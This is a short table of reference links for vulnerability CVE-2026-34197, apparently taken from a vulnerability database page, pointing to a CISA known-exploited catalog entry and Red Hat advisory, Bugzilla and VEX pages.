| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34197 |
| access.redhat.com |
NVD API
|
https://access.redhat.com/security/cve/CVE-2026-34197 |
| bugzilla.redhat.com |
NVD API
|
https://bugzilla.redhat.com/show_bug.cgi?id=2455869 |
| security.access.redhat.com |
NVD API
|
https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-34197.json |